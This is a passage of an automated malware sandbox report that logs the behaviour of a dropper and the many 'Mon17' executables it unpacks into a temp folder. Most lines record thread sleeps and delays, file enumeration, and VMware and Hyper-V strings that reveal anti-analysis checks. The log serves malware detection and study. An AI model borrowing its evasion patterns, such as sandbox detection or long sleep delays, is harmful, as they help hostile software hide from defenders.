                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -586554s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -586163s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -586009s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585883s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585765s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585624s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585482s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585373s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585264s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585154s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585040s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584922s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584811s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584702s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584591s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584470s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584344s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584234s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584115s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583828s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583620s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583469s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583233s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583123s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582905s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582795s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582684s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582577s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582466s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582330s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582203s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582093s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581982s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581874s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581765s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581656s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581547s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe TID: 8000Thread sleep count: 184 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe TID: 8000Thread sleep time: -46000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 7980Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep count: 5728 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep time: -3436800s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep count: 4254 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep time: -2552400s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7620Thread sleep count: 1122 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599844s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599708s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599485s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599313s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598985s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598678s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598486s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598338s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598232s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598123s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598011s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597825s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597683s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597556s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597437s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597317s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe TID: 8168Thread sleep time: -130000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe TID: 5676Thread sleep count: 32 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe TID: 5676Thread sleep time: -160000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7316Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7316Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 7000Thread sleep count: 433 > 30
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_64947880 GetSystemTimeAdjustment followed by cmp: cmp eax, 03h and CTI: jle 64947899h2_2_64947880
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00404B47 FindFirstFileW,1_2_00404B47
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00405FE9 GetSystemInfo,1_2_00405FE9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599886
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599543
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599424
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599303
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599172
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599048
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598922
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598812
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598333
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598187
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597992
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597867
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597746
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597440
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597307
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597182
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596892
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596771
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596497
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596359
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596156
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596020
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 595859
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 595250
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594844
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594699
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594422
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594265
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594071
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593916
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593784
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593625
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593484
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593355
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593249
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593061
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 592578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 592047
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591859
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591636
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591483
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591353
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591187
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591031
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590895
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590703
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590527
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590366
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590233
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590062
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 589265
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 589085
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588875
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588716
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588594
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588464
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588328
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587703
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587500
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587340
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587193
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 586554
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 586163
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 586009
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585883
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585624
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585482
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585373
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585264
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585154
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585040
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584922
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584811
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584702
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584591
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584470
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584344
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584234
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584115
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583828
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583469
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583233
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583123
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582905
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582795
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582684
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582577
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582466
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582330
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582203
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582093
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581982
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581874
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581656
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581547
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599844
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599708
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599485
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599313
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598985
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598678
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598486
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598338
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598232
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598123
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598011
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597825
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597683
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597556
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597437
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597317
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dllJump to behavior
                  Source: Amcache.hve.30.drBinary or memory string: VMware
                  Source: Amcache.hve.30.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Mon17e1fac3fd3d84b.exe, 00000015.00000002.1820974132.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF58F000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003223000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000324E000.00000004.00000020.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.3461889632.000002804842B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.3465196728.000002804D857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
